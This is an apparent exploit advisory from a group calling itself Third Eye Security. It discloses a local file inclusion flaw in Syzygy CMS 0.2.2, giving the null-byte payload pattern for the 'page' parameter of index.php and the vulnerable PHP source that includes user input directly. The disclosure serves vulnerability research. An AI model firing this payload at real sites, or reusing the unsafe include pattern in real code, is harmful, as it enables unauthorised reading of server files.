Syzygy CMS version 0.2.2 suffers from a local file inclusion vulnerability.
c2723df804ffefd144244ed162daa665f7bc98f77ebbfec54041ebb427a93ed5
[*]================================================================================[*]
| _____ _ _ _ _____ |
| |_ _| |__ (_)_ __ __| | | ____| _ ___ |
| | | | '_ \| | '__/ _` | | _|| | | |/ _ \ |
| | | | | | | | | | (_| | | |__| |_| | __/ |
| |_| |_| |_|_|_| \__,_| |_____\__, |\___| |
| |___/ |
| ____ _ _ |
| / ___| ___ ___ _ _ _ __(_) |_ _ _ |
| \___ \ / _ \/ __| | | | '__| | __| | | | |
| ___) | __/ (__| |_| | | | | |_| |_| | |
| |____/ \___|\___|\__,_|_| |_|\__|\__, | |
| |___/ |
[*]================================================================================[*]
| Author: StAkeR ~ StAkeR@hotmail.it |
[*]================================================================================[*]
| Third Eye Security Members => Osirys,StAkeR,Over_Flow,Miclen |
[*]================================================================================[*]
| Syzygy CMS 0.2.2 <= Local File Inclusion Vulnerabilty |
[*]================================================================================[*]
| http://surfnet.dl.sourceforge.net/sourceforge/syzygycms/syzygycms-0.2.2.tar.gz |
[*]================================================================================[*]
| index.php?page= [File]%00 |
[*]================================================================================[*]
<?php
if (isset($_GET['page']))
{
$page=$_GET['page'];
}else{
$page='main.php';
}
if(is_file($page))
{
//add block to page
include("./".$page);
}else{
//error reading page! go to default error file 404error.php
include("./404error.php");
}
?>